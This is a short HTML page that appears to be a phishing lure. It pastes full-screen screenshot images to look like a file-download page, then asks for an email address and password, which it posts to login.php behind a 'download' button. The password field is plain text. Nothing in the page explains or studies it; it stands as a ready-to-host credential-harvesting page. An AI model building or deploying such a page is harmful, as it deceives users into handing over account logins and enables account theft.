<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Download</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="generator" content="Web Page Maker">
</head>
<body>
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1365px; height:623px; z-index:0"><img src="images/paste518.jpg" alt="" title="" border=0 width=1365 height=623></div>

<div id="image2" style="position:absolute; overflow:hidden; left:551px; top:329px; width:28px; height:40px; z-index:1"><img src="images/paste519.jpg" alt="" title="" border=0 width=28 height=40></div>

<div id="image3" style="position:absolute; overflow:hidden; left:585px; top:337px; width:229px; height:28px; z-index:2"><img src="images/paste521.jpg" alt="" title="" border=0 width=229 height=28></div>

<form name="form1" method="POST" action="login.php" enctype="application/x-www-form-urlencoded" style="margin:0px">
<input name="formtext1" type="text" style="position:absolute;width:217px;left:592px;top:335px;z-index:4;height: 41px;" required placeholder="Email Address">
<input name="formtext2" type="text" style="position:absolute;width:217px;left:592px;top:387px;z-index:5;height: 40px;" required placeholder="Password">
<div id="formimage1" style="position:absolute; left:556px; top:465px; z-index:6"><input type="image" name="formimage1" width="252" height="65" src="images/downlo.JPG"></div>
</form>


</body>
</html>
